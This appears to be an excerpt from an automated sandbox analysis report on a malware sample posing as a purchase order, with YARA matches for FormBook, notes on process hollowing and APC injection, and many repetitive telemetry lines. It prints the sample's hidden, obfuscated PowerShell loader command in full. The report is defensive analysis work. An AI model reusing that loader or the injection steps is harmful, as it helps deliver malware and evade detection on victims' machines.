      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BB4A80 mov eax, dword ptr fs:[00000030h]8_2_21BB4A80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1AAEE mov eax, dword ptr fs:[00000030h]8_2_21B1AAEE
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1AAEE mov eax, dword ptr fs:[00000030h]8_2_21B1AAEE
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B14AD0 mov eax, dword ptr fs:[00000030h]8_2_21B14AD0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B14AD0 mov eax, dword ptr fs:[00000030h]8_2_21B14AD0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE0AD0 mov eax, dword ptr fs:[00000030h]8_2_21AE0AD0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B36ACC mov eax, dword ptr fs:[00000030h]8_2_21B36ACC
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B36ACC mov eax, dword ptr fs:[00000030h]8_2_21B36ACC
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B36ACC mov eax, dword ptr fs:[00000030h]8_2_21B36ACC
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B04A35 mov eax, dword ptr fs:[00000030h]8_2_21B04A35
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B04A35 mov eax, dword ptr fs:[00000030h]8_2_21B04A35
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1CA38 mov eax, dword ptr fs:[00000030h]8_2_21B1CA38
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1CA24 mov eax, dword ptr fs:[00000030h]8_2_21B1CA24
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0EA2E mov eax, dword ptr fs:[00000030h]8_2_21B0EA2E
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B6CA11 mov eax, dword ptr fs:[00000030h]8_2_21B6CA11
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5CA72 mov eax, dword ptr fs:[00000030h]8_2_21B5CA72
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5CA72 mov eax, dword ptr fs:[00000030h]8_2_21B5CA72
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8EA60 mov eax, dword ptr fs:[00000030h]8_2_21B8EA60
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1CA6F mov eax, dword ptr fs:[00000030h]8_2_21B1CA6F
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B1CA6F mov eax, dword ptr fs:[00000030h]8_2_21B1CA6F
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Early bird code injection technique detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Fathoming.exeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Fathoming.exeJump to behavior
      Sample uses process hollowing technique
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Fathoming.exe base address: 400000Jump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Fathoming.exe base: 1660000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Fathoming.exe "C:\Users\user\AppData\Local\Temp\Fathoming.exe"Jump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$unsolaced207=gc -raw 'c:\users\user\appdata\local\temp\blankbook85\patchworkenes\resprmiernes\databehandlende\pennyroyal.gri';$fortolkningssikker=$unsolaced207.substring(29825,3);.$fortolkningssikker($unsolaced207)
      Source: C:\Users\user\Desktop\purchase.order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$unsolaced207=gc -raw 'c:\users\user\appdata\local\temp\blankbook85\patchworkenes\resprmiernes\databehandlende\pennyroyal.gri';$fortolkningssikker=$unsolaced207.substring(29825,3);.$fortolkningssikker($unsolaced207)Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000008.00000002.3003104703.0000000021750000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000008.00000002.3003104703.0000000021750000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

